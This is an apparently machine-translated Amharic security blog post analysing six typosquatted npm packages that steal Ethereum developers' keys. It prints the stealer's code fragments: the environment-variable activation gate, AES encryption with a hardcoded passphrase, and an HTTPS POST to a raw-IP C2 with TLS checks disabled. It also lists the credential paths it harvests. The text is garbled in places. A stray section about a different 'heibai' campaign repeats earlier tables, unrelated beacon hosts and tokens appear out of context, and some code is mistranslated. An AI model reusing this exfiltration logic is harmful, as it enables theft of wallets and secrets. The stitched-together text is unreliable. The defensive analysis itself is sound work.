EVMDeFi npm Typosquatting Attack የገንቢ ቁልፎችን ይሰርቃል

EVM/DeFi npm የታይፖስኳቲንግ ጥቃት የገንቢ ቁልፎችን ይሰርቃል

TL; DR

በግንቦት 6፣ 2026፣ አንድ ነጠላ npm አሳታሚ፣ namikazesarada010206, የኢቴሬም፣ የሶሊቲቲ እና የዴፋይ ገንቢ ሥነ-ምህዳርን ኢላማ ያደረጉ ስድስት ተንኮል አዘል ፓኬጆችን ገፋ።

ፓኬጆቹ፣ viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, እና web3-utils-core, ለታዋቂ የWeb3 መሳሪያዎች እንደ አጋዥ ቤተ-መጻሕፍት እንዲመስሉ የተነደፉ አሳማኝ ስሞችን ተጠቅሟል።

ስድስቱም ፓኬጆች ተመሳሳይ ይዘት ነበራቸው telemetry.js ፋይል። ፋይሉ በክላስተሩ ውስጥ በባይት-ተመሳሳይ ነበር፣ SHA-256 ያለው፡

SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

ማልዌር በተጫነበት ጊዜ አይሰራም። ምንም አይነት preinstall or postinstall መንጠቆ። በምትኩ፣ ፓኬጁ ከውጭ ሲገባ ያነቃቃል require().

ያ ዝርዝር ጉዳይ አስፈላጊ ነው።

ተከላው አንድ ገንቢ ጥቅሉን በትክክል እስኪጠቀም ድረስ ይጠብቃል። ከዚያም የሥራ ቦታው እውነተኛ የኢቴሬም/የሶሊቲ ልማት አካባቢ መሆኑን ያረጋግጣል። የአልኬሚ ወይም የኢንፉራ ቁልፎችን፣ የግል ቁልፎችን፣ የማኒሞኒክስ መሳሪያዎችን፣ የማሰማሪያ ቁልፎችን ወይም የአካባቢውን የፋውንድሪ ማውጫ ይፈልጋል።

አስተናጋጁ የሚዛመድ ከሆነ፣ ሌባው የSSH የግል ቁልፎችን፣ የፋውንድሪ / ጌት / የብራውኒ የኪስ መሸጫ ሱቆችን ይሰበስባል፣ .env* ፋይሎች እና ሚስጥራዊ የአካባቢ ተለዋዋጮች። ጥቅሉን በጠንካራ ኮድ የተለጠፈ የይለፍ ሐረግ በመጠቀም በAES-256-GCM ያመሰጥረዋል እና የTLS ማረጋገጫ ተሰናክሎ ወደ ጥሬ IPv4 C2 የመጨረሻ ነጥብ ያወጣዋል።

የXygeni የማልዌር ቅድመ ማስጠንቀቂያ (MEW) ስርዓት ስድስቱንም ፓኬጆች ተንኮል አዘል እንደሆኑ አረጋግጧል። የnpm መዝገብ ቤት የማውረድ ሪፖርት ጥቅል በመጠባበቅ ላይ ነው።

ክላስተር፡ ስድስት ፓኬጆች፣ አንድ አሳታሚ

የአሳታሚው መለያ namikazesarada010206 ካልተረጋገጠው የጂሜይል አድራሻ ጋር ተገናኝቷል namikazesarada010206@gmail.com.

ዘመቻው ግንቦት 6፣ 2026 የአንድ ቀን ህትመት እንደተጀመረ ታየ። ስድስቱም ፓኬጆች እንደ እትም ተቀርጸዋል። 1.0.0, ዜሮ የሩጫ ጊዜ ጥገኝነቶች ነበሩት፣ እና ሶስት ፋይሎች ብቻ ተልከዋል፡

package.json index.js telemetry.js

እንዲሁም ተመሳሳይ የምንጭ ማከማቻ አውጀዋል፡

https://github.com/harunosakura030303-maker/evmchain-config

የመጀመሪያዎቹ ሶስት ፓኬጆች በመጀመሪያው ህትመት ላይ በMEW ስካነሮች ተይዘዋል። የቀሩት ሦስቱ የአሳታሚውን npm መገለጫ ተንታኝ ከገመገመ በኋላ በኃይል ምልክት ተደርጎባቸዋል። በአንድ ወቅት ተመሳሳይ ባይት-ተመሳሳይ telemetry.js በክላስተር ውስጥ በሙሉ ተረጋግጧል፣ ወጥነት ባለው መልኩ ተንኮል አዘል እንደሆኑ ተዘግተዋል።

ጥቅል ትርጉም npm ታትሟል የMEW ቲኬት ዉሳኔ
ቪም-ኮር 1.0.0 2026-05-06 01:38:44Z #51049 ተንኮል አዘል
viem-utils-core 1.0.0 2026-05-06 #51050 ተንኮል አዘል
hardhat-core-utils 1.0.0 2026-05-06 #51051 ተንኮል አዘል
evm-utils 1.0.0 2026-05-06 #51069 ተንኮል አዘል፣ ወጥነት ባለው መልኩ
የፋውንድሪ-ዩቲሊቲዎች 1.0.0 2026-05-06 #51071 ተንኮል አዘል፣ ወጥነት ባለው መልኩ
web3-utils-core 1.0.0 2026-05-06 #51070 ተንኮል አዘል፣ ወጥነት ባለው መልኩ

የስያሜ ስትራቴጂው ቀላል ግን ውጤታማ ነው።

እነዚህ ፓኬጆች ትክክለኛ የላይፍ ስሞችን አያስመስሉም። በምትኩ፣ እንደ -core, -utils, እና -utils-coreይህም አንድ ገንቢ በWeb3 የመሳሪያ መሳሪያዎች አቅራቢያ ሊያያቸው የሚችላቸው ተጓዳኝ ቤተ-መጻሕፍት እንዲመስሉ ያደርጋቸዋል።

ተንኮል አዘል ጥቅል ሕጋዊ ኢላማ
ቪም-ኮር ቪኤም፣ ታዋቂ የ Ethereum TypeScript ደንበኛ
viem-utils-core ቪም
hardhat-core-utils ሃርድሃት፣ ዋና የጠንካራነት ልማት አካባቢ
evm-utils አጠቃላይ የEVM የመሳሪያ ስም ቦታ
የፋውንድሪ-ዩቲሊቲዎች የማምረቻ ፋብሪካ፣ የጠንካራነት መሣሪያ ሰንሰለት
web3-utils-core web3-utils፣ Web3.js አጋዥዎች

ይህ "ተጨማሪ ፓኬጅ" ንድፍ ነው፡ "እኔ እውነተኛ ፓኬጅ ነኝ" ሳይሆን "በእውነተኛ ፓኬጅ ዙሪያ ምክንያታዊ ረዳት እመስላለሁ"።

ለዴፋይ ገንቢዎች በፍጥነት ለሚንቀሳቀሱ፣ ይህ አደጋ ለመፍጠር በቂ ነው።

ፓኬጁ ከውጭ ሲገባ ምን ይከሰታል

የጥቃት ሰንሰለቱ ትንሽ፣ ሆን ተብሎ የተደረገ እና በክሪፕቶ ልማት አካባቢዎች ላይ ያተኮረ ነው።

የመጫኛ መንጠቆ የለም። በምትኩ፣ እያንዳንዱ ጥቅል የሚከተሉትን ያካትታል index.js የስታብ ተግባርን ወደ ውጭ ይልካል እና ከዚያም ተንኮል አዘል የቴሌሜትሪ ሞጁሉን ይጭናል።

require('./telemetry').init();

ይህ ማለት ማልዌር ለመጀመሪያ ጊዜ ሲገባ ይነቃቃል ማለት ነው።

ይህ ለአጥቂው በአሠራር ረገድ ጠቃሚ ነው። ብዙ ስካነሮች እና የአሸዋ ሳጥኖች በመጫኛ ጊዜ ባህሪ ላይ ያተኩራሉ። ይህ ጥቅል በገንቢ፣ በግንባታ ስክሪፕት፣ በሙከራ ስብስብ ወይም በአሂድ ጊዜ መንገድ በትክክል እስኪጠቀምበት ድረስ ይጠብቃል።

የማግበር በር፡ በእውነተኛ የድር3 ገንቢ የስራ ጣቢያዎች ላይ ብቻ እሳት

የመትከያው በጣም አስፈላጊው ክፍል የማግበር በር ነው።

ማልዌር በኤቲሬም / ሶሊቲቲ ዴቨሎፐር ማሽኖች ላይ በተለምዶ የሚገኙትን የአካባቢ ተለዋዋጮች ይፈትሻል፡

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

እንዲሁም ፋውንድሪ የተጫነ መስሎ ይታይ እንደሆነ ያረጋግጣል፦

fs.existsSync(path.join(os.homedir(), '.foundry'))

ሁለቱም ሁኔታዎች እውነት ካልሆኑ፣ ተግባሩ ይመለሳል እና ምንም አያደርግም።

ይህ ጥቅሉን በአጠቃላይ የትንታኔ አካባቢዎች ጸጥ ያደርገዋል። የፋውንድሪ፣ የአልኬሚ ቁልፎች፣ የኢንፉራ ቁልፎች፣ የግል ቁልፎች ወይም የማኒሞኒክስ ምልክቶች የሌሉት የአሸዋ ሳጥን ምንም ጉዳት የሌለው የሚመስል ጠቀሜታ ሊያሳይ ይችላል።

በተዛማጅ አስተናጋጅ ላይ፣ ማልዌር ከመሰብሰቡ በፊት ከ60 እስከ 90 ሰከንዶች ይጠብቃል፡

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

መዘግየቱ በማስመጣት እና በማውጣት መካከል ያለውን ግልጽ ትስስር ይቀንሳል። .unref() ጥሪው ፓኬጁ በአጭር ጊዜ ስክሪፕት ውስጥ ከገባ የአስተናጋጁ ሂደት በመደበኛነት እንዲወጣ ያስችለዋል።

ይህ ጫጫታ የሚፈጥር የማጭበርበሪያ ባህሪ አይደለም። የገንቢው አካባቢ መስረቅ ተገቢ ካልሆነ በስተቀር ከመሮጥ ለመቆጠብ የተነደፈ የታለመ ሌባ ነው።

ሌባው የሚሰበስበው ነገር

የማግበሪያው በር ካለፈ በኋላ፣ ማልዌር በWeb3 ልማት ውስጥ በጣም አስፈላጊ ከሆኑ ምንጮች ይሰበስባል፡ የግል ቁልፎች፣ የኪስ ቦርሳ ቁልፍ መደብሮች፣ የማሰማሪያ ምስክርነቶች፣ የደመና ምስጢሮች፣ የnpm ቶከኖች እና የአካባቢ ፕሮጀክት ውቅር።

ምንጭ ምን ይሰበሰባል?
process.env ማንኛውም ተለዋዋጭ ማዛመጃ /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* PRIVATE KEY ወይም BEGIN OPENSSH የያዙ ፋይሎች፣ ሙሉ የፋይል ይዘትን ጨምሮ
~/.ፋውንዴሪ/ኪስቶሮች/* የፋውንድሪ የኪስ ቦርሳ ቁልፍ ማከማቻ ፋይሎች
~/.ethereum/keystore/* የጌት የኪስ መሸጫ ፋይሎች
~/.ብራውኒ/አካውንቶች/* የብራውኒ የኪስ ቦርሳ ቁልፍ ማከማቻ ፋይሎች
${cwd}/.env ሙሉ የፋይል ይዘት
${cwd}/.env.local ሙሉ የፋይል ይዘት
${cwd}/.env.production ሙሉ የፋይል ይዘት
${cwd}/.env.development ሙሉ የፋይል ይዘት
የ os.hostname() የአስተናጋጅ ሜታዳታ
ክሪፕቶ.በዘፈቀደUUID() የተጎጂ/የክፍለ ጊዜ መለያ
ቀን.አሁን() የስብስብ የጊዜ ማህተም
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

የATTA ቶከኖች የሚከተሉት ናቸው፡

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

ቴሌሜትሪው የኦፕሬተሩ የራሱ ትንታኔ ወይም የተለየ የገንዘብ ድጋፍ የሚደረግለት ቻናል መሆኑን ማረጋገጥ አልቻልንም። የATTA ቶከኖች በመረመርናቸው ሁለቱም ናሙናዎች ውስጥ አንድ አይነት ናቸው።

ክላስተር ቢ፡ ሄይባይ

claude.hk OAuth ፊሺንግ + ANTHROPIC_BASE_URL ጠለፋ

የኤፕሪል 1 ናሙና የዘመቻው ቀዳሚ ክንድ የበለጠ ጨካኝ ነው።

heibai:2.1.88-claude.hk-4 የታተመው በ wuguoqiangvip28, አንድ መለያ የተፈጠረው ሰኔ 7፣ 2025 ነው። ፓኬጁ እራሱን ከህጋዊው ጋር በግልጽ አዛብቶታል። 2.1.88 አንትሮፒክ ልቀት።

ከCA-cert MITM ጋር አይገናኝም። በምትኩ፣ ለተጠቃሚው ስለ OAuth የመጨረሻ ነጥብ ይዋሻል።

በተለቀቀው የክላውድ ኮድ ምንጭ ላይ የተጨመሩት ተንኮል አዘል ተጨማሪዎች የሚከተሉትን ያካትታሉ፡

ምንጭ ምን ይሰበሰባል?
process.env ማንኛውም ተለዋዋጭ ማዛመጃ /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* PRIVATE KEY ወይም BEGIN OPENSSH የያዙ ፋይሎች፣ ሙሉ የፋይል ይዘትን ጨምሮ
~/.ፋውንዴሪ/ኪስቶሮች/* የፋውንድሪ የኪስ ቦርሳ ቁልፍ ማከማቻ ፋይሎች
~/.ethereum/keystore/* የጌት የኪስ መሸጫ ፋይሎች
~/.ብራውኒ/አካውንቶች/* የብራውኒ የኪስ ቦርሳ ቁልፍ ማከማቻ ፋይሎች
${cwd}/.env ሙሉ የፋይል ይዘት
${cwd}/.env.local ሙሉ የፋይል ይዘት
${cwd}/.env.production ሙሉ የፋይል ይዘት
${cwd}/.env.development ሙሉ የፋይል ይዘት
የ os.hostname() የአስተናጋጅ ሜታዳታ
ክሪፕቶ.በዘፈቀደUUID() የተጎጂ/የክፍለ ጊዜ መለያ
ቀን.አሁን() የስብስብ የጊዜ ማህተም

የታለመው ዝርዝር በጣም ልዩ ነው። ይህ አጠቃላይ የአሳሽ ስርቆት ወይም ሰፊ የምስክርነት ማጭበርበሪያ አይደለም። የኤቴሬም መተግበሪያዎችን ለሚገነቡ፣ ለሚሞክሩ፣ ለሚያሰማሩ ወይም ለሚያካሂዱ ገንቢዎች የታለመ ነው።

የፋውንድሪ፣ የጌት እና የብራውኒ ቁልፍ መደብሮችን ማካተት በተለይ አስፈላጊ ነው። እነዚህ ፋይሎች ወደ ቦርሳዎች ወይም የማሰማሪያ ማንነቶች ቀጥተኛ መዳረሻን ሊወክሉ ይችላሉ። አጥቂው ከይለፍ ቃላት፣ ከማስታወሻዎች ወይም ከአካባቢ ምስጢሮች ጋር ማጣመር ከቻለ፣ ገንዘብ ማዛወር፣ አሰማሪዎችን ማስመሰል ወይም ብልጥ የኮንትራት ስራዎችን ማበላሸት ይችሉ ይሆናል።

ከማጣራት በፊት ኢንክሪፕሽን

ማልዌር የተሰበሰበውን መረጃ ከመላክዎ በፊት ኢንክሪፕት ያደርጋል።

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

ጠንካራ ኮድ የተደረገበት የይለፍ ቃል የሚከተለው ነው፦

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

የመጨረሻው የክፍያ ጭነት እንደ JSON ተጠቅልሏል፡

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

ኢንክሪፕሽን ማልዌርን በራሱ የበለጠ የላቀ አያደርገውም። ሆኖም ግን፣ የአውታረ መረብ ፍተሻን አስቸጋሪ ያደርገዋል። መውጣትን የሚመለከት ተከላካዩ የJSON ክፍያ ጭነት ያያል፣ ነገር ግን የተሰረቁ ቁልፎችን፣ የኪስ ቦርሳ ፋይሎችን ወይም .env ያለ ጠንካራ ኮድ የተቀመጠው የይለፍ ሐረግ እና ዲክሪፕት ሎጂክ ይዘቶች።

ወደ ጥሬ IPv4 C2 ማጣሪያ

የማጣሪያ መንገዱ በጥብቅ ኮድ የተለጠፈ ነው፦

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

ማልዌር ውሂብ ይልካል ወደ፦

https://76.13.37.80:8443/api/v1/telemetry

ሁለት ዝርዝሮች ጎልተው ይታያሉ።

በመጀመሪያ፣ C2 ከዶሜይን ይልቅ ጥሬ የአይፒቪ4 አድራሻ ነው። ይህም የጎራ ምዝገባን አስፈላጊነት ያስወግዳል እና አንዳንድ በጎራ ላይ የተመሰረቱ ግኝቶችን ያስወግዳል።

ሁለተኛ፣ የTLS ማረጋገጫ በሚከተለው ተሰናክሏል፦

rejectUnauthorized: false

ይህ ተንኮል አዘል ዌር ማንኛውንም የምስክር ወረቀት እንዲቀበል ያስችለዋል፣ ይህም የራስ-የተፈረሙ የምስክር ወረቀቶችን ጨምሮ። በሌላ አነጋገር፣ አጥቂው ትክክለኛ የህዝብ የምስክር ወረቀት ሳያስፈልገው የተመሰጠረ ትራንስፖርት ያገኛል።

የድጋሚ ሙከራ አመክንዮ እና የfallback አስተናጋጅ የለም። ስህተቶች በጸጥታ ይዋጣሉ። ይህ C2 ከመስመር ውጭ ከሆነ ወይም ሊደረስበት የማይችል ከሆነ ጥቅሉን ጸጥ ያደርገዋል።

ይህ ዘመቻ ለምን አስፈላጊ ነው?

ገንቢዎች ሰፊ ምስክርነቶችን ለማሳደድ የታለሙ አብዛኛዎቹ ተንኮል አዘል የnpm ፓኬጆች፡ npm tokens፣ AWS keys፣ GitHub tokens፣ ወይም .npmrc ፋይሎችን.

ይህ ዘመቻ ኢላማውን ያጠባል።

ማሽኑ የኤቴሬም ወይም የሶሊቲ ገንቢ መሆኑን የሚያሳዩ ምልክቶችን ይፈልጋል። ከዚያም በዚያ አካባቢ ውስጥ አስፈላጊ የሆኑትን ንብረቶች በትክክል ይጎትታል፡ የኪስ ቦርሳ ቁልፍ መደብሮች፣ የግል ቁልፎች፣ ማኒሞኒክስ፣ የማሰማሪያ ቁልፎች፣ .env ፋይሎች እና የSSH ቁልፎች።

ይህ ዘመቻውን ለWeb3 ቡድኖች ከአጠቃላይ npm ሌባ ይልቅ አደገኛ ያደርገዋል።

የተሳካ ኢንፌክሽን የሚከተሉትን ሊያሳይ ይችላል፦

  • የማሰማሪያ ቦርሳዎች
  • ስማርት የኮንትራት አስተዳዳሪ ቁልፎች
  • የ RPC አቅራቢ ቁልፎች
  • የደመና ማሰማራት ምስክርነቶች
  • የnpm ህትመት ቶከኖች
  • የSSH መዳረሻ ለገንቢ ወይም ለግንባታ መሠረተ ልማት
  • የፕሮጀክት ምስጢሮች የተከማቹት በ .env ፋይሎች
  • ለፋውንድሪ፣ ለጌት ወይም ለብራውኒ የኪስ ቦርሳዎች

የጥቅሉ ስሞችም ግልጽ የሆነ የማህበራዊ ምህንድስና ያሳያሉ። የWeb3 ገንቢ ሥነ-ምህዳርን በታወቁ የመሳሪያ ስሞች ያነጣጠሩ ናቸው፡ viem, hardhat, foundry, evm, እና web3.

ተዋናዩ እውነተኛ ፕሮጀክቶችን ማቃለል አያስፈልገውም። ምክንያታዊ የሆነ ተጓዳኝ ፓኬጅ የሚመስል ነገር ለመጫን ገንቢ ብቻ ነው የሚያስፈልጋቸው።

የመደራደር እና የመለየት አመላካቾች

ፓኬጆች እና አሳታሚ
መስክ ዋጋ
የኤንፒኤም አሳታሚ namikazesarada010206
የአሳታሚ ኢሜይል namikazesarada010206@gmail.com
ኢሜል ተረጋግጧል አይ
SCM ተረጋግጧል አይ
የዝና ውጤት 1.0
ጥቅሎች viem-core፣ viem-utils-core፣ hardhat-core-utils፣ evm-utils፣ foundry-utils፣ web3-utils-core
ስሪቶች ሁሉም 1.0.0
የምንጭ ማከማቻ https://github.com/harunosakura030303-maker/evmchain-config
ተንኮል አዘል መሆኑ ተረጋግጧል ስድስቱም ፓኬጆች በሙሉ
አውታረ መረብ
ዓይነት ዋጋ
የC2 የመጨረሻ ነጥብ https://76.13.37.80:8443/api/v1/telemetry
C2 አይፒ 76.13.37.80
የC2 ወደብ 8443/tcp
የTLS ባህሪ refuseUnauthorized: ሐሰት
የክፍያ ጭነት ንድፍ {"v":2,"iv": "d": "ት": }
ፋይሎች እና ሃሾች
ዓይነት ዋጋ
ቴሌሜትሪ.js SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
የጥቅል አቀማመጥ package.json, index.js, telemetry.js
የፋይል ብዛት 3
ግምታዊ ጠቅላላ መጠን 3.4 ኪባ

የማግበር ምልክቶች

ማልዌር እነዚህን የአካባቢ ተለዋዋጮች ይፈትሻል፦

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

እንዲሁም የሚከተሉትን ይፈትሻል፦

~/.foundry/

የታለሙ የአስተናጋጅ መንገዶች

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

የሬጅክስ ስብስብ

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

የክትትል ማስታወሻዎች

ሙሉ የባህሪ ትንተና ሳያስፈልግ ይህንን ዘመቻ የሚመለከቱ በርካታ ህጎች አሉ።

በመጀመሪያ፣ የስድስቱን ተንኮል አዘል የጥቅል ስሞች ለማግኘት የመቆለፊያ ፋይሎችን ይቃኙ፦

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

ማንኛውም ተዛማጅ በ package-lock.json, yarn.lock, pnpm-lock.yaml, ወይም node_modules ታሪክ እንደ ከባድ ክስተት መታየት አለበት።

ሁለተኛ፣ የNode.js የኪስ ቦርሳ ቁልፍ ማከማቻ መንገዶችን የሚያነብ ሂደትን መከታተል፡

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

ይህ እንደ አጋዥ ጥገኝነት ከገባ ፓኬጅ ጋር በተያያዘ አልፎ አልፎ ህጋዊ ባህሪ ነው። በተለይም ወደ ውጭ የሚወጣ የአውታረ መረብ እንቅስቃሴ ሲከተል አጠራጣሪ ነው።

ሶስተኛ፣ በሚከተሉት የHTTPS ግንኙነቶች ላይ አግድ ወይም አሳውቅ፦

76.13.37.80:8443

በተለይም የጥያቄው መንገድ የሚከተለው ከሆነ፦

/api/v1/telemetry

አራተኛ፣ እነዚህን ባህሪያት የሚያጣምሩ የnpm ፓኬጆችን ይፈልጉ፡

  • አዲስ ወይም ዝቅተኛ ስም ያለው አታሚ
  • ያልተረጋገጠ የጂሜይል መለያ
  • ከWeb3 አጠገብ ያለው የጥቅል ስም
  • ትርጉም ያለው የማከማቻ ታሪክ የለም
  • የትንሽ ጥቅል አቀማመጥ
  • index.js የቴሌሜትሪ ወይም የረዳት ፋይል የሚጭን
  • ምንም የሩጫ ጊዜ ጥገኝነቶች የሉም
  • ስሜታዊ አካባቢ-ተለዋዋጭ ስብስብ
  • የኪስ ቦርሳ ቁልፍ መደብር መዳረሻ

ይህ ንድፍ ከአንድ ነጠላ IOC የበለጠ ጠቃሚ ነው ምክንያቱም የሚቀጥለው ጥቅል የአይፒ አድራሻውን ሊለውጥ ይችላል ነገር ግን ተመሳሳይ የዒላማ አመክንዮ ሊኖረው ይችላል።

የመደራደር ምላሽ ዝርዝር

አንድ ገንቢ ከስድስቱ ፓኬጆች ውስጥ አንዱን ከተጠቀመ እና አካባቢው ከማግበር በር ጋር የሚዛመድ ከሆነ፣ የስራ ቦታውን እንደተጎዳ አድርገው ይቁጠሩት።

ይህም የፋውንድሪ የተጫኑ ማሽኖችን፣ በአካባቢ ውስጥ ያሉ የአልኬሚ ወይም የኢንፉራ ቁልፎችን፣ የግል ቁልፎችን፣ የማስታወሻ መሳሪያዎችን ወይም የማሰማሪያ ቁልፎችን ያካትታል።

የሚመከር ምላሽ፡

  • አስተናጋጁን ከአውታረ መረቡ ያላቅቁ።
  • ጠብቅ node_modules፣ የመቆለፊያ ፋይሎች፣ የሼል ታሪክ እና ለፎረንሲክ ጥናት ተዛማጅ ምዝግብ ማስታወሻዎች።
  • እያንዳንዱን የSSH ቁልፍ ጥንድ ከስር ያሽከርክሩ ~/.ssh/.
  • ለእያንዳንዱ የቁልፍ መደብር የኪስ ቦርሳ ቁልፎችን ያሽከርክሩ ~/.foundry, ~/.ethereum, እና ~/.brownie.
  • ገንዘቦችን ወደ አዲስ የኪስ ቦርሳዎች ያስተላልፉ።
  • የተከማቸውን እያንዳንዱን ሚስጥር ያሽከርክሩ .env* ገንቢው የሰራባቸው ማከማቻዎች ውስጥ ያሉ ፋይሎች።
  • ከስብስብ ሬጅክስ ጋር የሚዛመዱ የአካባቢ ምስጢሮችን ያሽከርክሩ፣ ይህም የAWS ቁልፎችን፣ የnpm ቶከኖችን፣ የማስታወቂያ ቶከኖችን፣ የኤፒአይ ቁልፎችን፣ የግል ቁልፎችን፣ ዘሮችን እና የማስታወሻ ደብተሮችን ያካትታል።
  • ፓኬጁ ለመጀመሪያ ጊዜ ከተጫነበት ጊዜ ጀምሮ የኦዲት ክላውድ፣ npm፣ GitHub፣ RPC አቅራቢ እና የblockchain እንቅስቃሴ።
  • እንደገና ጥቅም ላይ ከመዋሉ በፊት የስራ ቦታውን እንደገና ምስል ይስሩ።

ተከላካዮች ምን መውሰድ አለባቸው

ይህ ዘመቻ የ npm የፊደል አጻጻፍ በከፍተኛ ዋጋ ባላቸው የገንቢ ሥነ-ምህዳሮች ዙሪያ እንዴት እየተለወጠ እንዳለ ያሳያል።

ተዋናይው ጽናት አላስፈለገውም። ግርግር አያስፈልጋቸውም ነበር። የመጫኛ ጊዜ እንኳን አፈጻጸም አያስፈልጋቸውም ነበር።

በምትኩ፣ በሦስት ነገሮች ላይ ይተማመኑ ነበር፡

  • ሊሆኑ የሚችሉ የWeb3 ጥቅል ስሞች
  • ማግበር በእውነተኛ የክሪፕቶ-ልማት ማሽኖች ላይ ብቻ
  • ለኤቲሬም ገንቢዎች በጣም አስፈላጊ የሆኑትን ፋይሎች እና ምስጢሮች በቀጥታ መስረቅ

ይህ ዘመቻው በሰፊው ቅኝት በቀላሉ እንዳይታለፍ እና በትክክለኛው አካባቢ ሲደርስ አደገኛ ያደርገዋል።

ለWeb3 ቡድኖች፣ ትምህርቱ ግልጽ ነው፡ የጥገኝነት ስሞችን እንደ የስጋት ሞዴልዎ አካል አድርገው ይቁጠሩ። ምንም ጉዳት የሌለው ረዳት የሚመስል ጥቅል አሁንም የኪስ ቦርሳ ስምምነት ለማድረግ አጭሩ መንገድ ሊሆን ይችላል።

ለnpm መዝገብ ቤት ሪፖርት ተደርጓል። የአታሚው መለያ እና ፓኬጆች ሲወገዱ ይህንን ልጥፍ እናዘምነዋለን።

sca-tools-software-composition-analyse-tools
የሶፍትዌር አደጋዎችዎን ቅድሚያ ይስጡ፣ ያስተካክሉ እና ይጠብቁ
ነፃ መለያ ያግኙ።
ምንም ዱቤ ካርድ አያስፈልግም።

የሶፍትዌር ልማትዎን እና አቅርቦትዎን ደህንነት ይጠብቁ

ከ Xygeni Product Suite ጋር